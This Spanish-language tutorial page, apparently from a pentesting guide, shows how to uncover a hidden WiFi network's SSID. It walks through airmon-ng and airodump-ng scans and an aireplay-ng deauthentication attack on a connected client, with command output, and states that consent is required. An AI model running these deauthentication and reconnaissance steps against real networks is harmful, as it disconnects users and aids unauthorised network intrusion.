🌐Redes ocultas
En esta sección vamos a hacer ataques a redes WiFi que se encuentran ocultas o no visibles al público general.
Disclaimer: Vamos a realizar ataques a redes WiFi, por lo que no podemos utilizar estas técnicas sin un consentimiento o aprobación por parte del objetivo
Configurar red oculta
En el panel de control del WiFi habilitar la opción "Esconder SSID":

No aparece en la lista de redes wifi, y al conectarnos nos muestra este mensaje:

Detectar red con el SSID oculto
# 1 - Apagamos el adaptador wlan0
ifconfig wlan0 down
# 2 - Iniciamos airmon-ng
sudo airmon-ng start wlan0
# 3- Encontrar al objetivo
sudo airodump-ng wlan0
CH 1 ][ Elapsed: 1 min ][ 2023-11-02 10:22 ][ paused output
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
EA:66:AB:4C:31:OA -56 55 0 0 1 720 WPA2 CCMP PSK <length: 0>
|------------|
# El ESSID <length: 0> nos indica que tiene el SSID oculto
# Dependiendo del tipo de cifrado puede mostrar el número de caracteres
Ver dispositivos en una red oculta
# 4 - Iniciamos airodump-ng con el BSSID objetivo y su CHANNEL
sudo airodump-ng --bssid EA:66:AB:4C:31:OA --channel 1 wlan0
CH 1 ][ Elapsed: 2 mins ][ 2023-11-02 10:38 ][ paused output
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
EA:66:AB:4C:31:EA -53 48 307 57 0 1 720 WPA2 CCMP PSK <length: 0>
BSSID STATION PWR Rate Lost Frames Notes Probes
EA:66:AB:4C:31:OA CE:C1:C0:DB:DF:1F -15 0 -24 0 402
|-----------------|
Ataque: Desvelar SSID
Debemos realizar un deauth a algún dispositivo de la red para que desvele el SSID en la reconexión:
# Solamente necesitamos enviar 1 paquete para este ataque
sudo aireplay-ng --deauth 1 -a EA:66:AB:4C:31:OA -c CE:C1:C0:DB:DF:1F wlan0
10:44:28 Waiting for beacon frame (BSSID: EA:66:AB:4C:31:EA) on channel 1
10:44:28 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [ 0|62 ACKs]
10:44:29 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [ 0|63 ACKs]
10:44:29 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [ 4|59 ACKs]
10:44:30 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [38|59 ACKs]
10:44:31 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [43|60 ACKs]
10:44:31 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [47|62 ACKs]
10:44:32 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [43|60 ACKs]
10:44:32 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [12|85 ACKs]
10:44:33 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [ 6|63 ACKs]
10:44:33 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [ 0|60 ACKs]
10:44:34 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [ 0|61 ACKs]
10:44:34 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [ 0|63 ACKs]
10:44:35 Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [ 0|62 ACKs]
CH 1 ][ Elapsed: 10 mins ][ 2023-11-02 10:46 ][ paused output
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
EA:66:AB:4C:31:EA -49 58 2885 290 0 1 720 WPA2 CCMP PSK INHACKEABLE
BSSID STATION PWR Rate Lost Frames Notes Probes
EA:66:AB:4C:31:OA CE:C1:C0:DB:DF:1F -61 1e- 1 0 3899 EAPOL INHACKEABLE
Como podemos ver ahora si se muestra el SSID de la red.
Última actualización
¿Te fue útil?